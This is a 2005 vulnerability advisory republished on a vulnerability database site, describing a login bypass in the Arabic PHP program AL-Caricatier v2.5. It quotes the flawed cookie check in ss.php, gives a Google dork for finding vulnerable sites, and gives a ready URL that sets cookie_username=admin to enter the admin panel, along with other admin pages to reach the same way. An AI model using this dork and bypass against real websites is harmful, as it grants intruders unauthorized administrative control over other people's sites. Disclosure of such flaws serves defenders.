Vulners
Lucene search
AL-Caricatier.txt
`Vulnerability in AL-Caricatier,V.2.5
Hello...
i found a vulneribility in an program called AL-Caricatier it's an
arabic program
site:
http://www.php-ar.com
Vulnerability:
Login Bypass
GoogleDork:
inurl:view_caricatier. php
Vunlerability in an included file called ss.php which resides in
the admin directory...
if($cookie_username){
echo"";
}else{
echo"<font face='tahoma' size='2'>You Didn't Sign in äå Êâå ÈÊÓÌêä
ÇäÏÎèä</b>";
echo"<meta http-equiv='Refresh' content='1;
url=admin_login.php'>";
EXIT;
}
the admin directory is protected user and password but u can
bypass them by going to this link:
www.victim.com/view_caricatier.php<http://www.victim.com/view_caricatier.php>
To bypass:
www.victim.com/admin/welcome.php?cookie_username=admin<http://www.victim.com/admin/welcome.php?cookie_username=admin>
or any of the admin files instead of welcome.php
like :
add-flashFile.php
caricatier_add.php
delete_cat.php
and u r in the admin interface...
--
(r).....Now I Am Become Death....The Destroyer Of Worlds.....The Creator oF
Genuises....(c)
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
26 Oct 2005 00:00Current
7.4High risk
Vulners AI Score7.4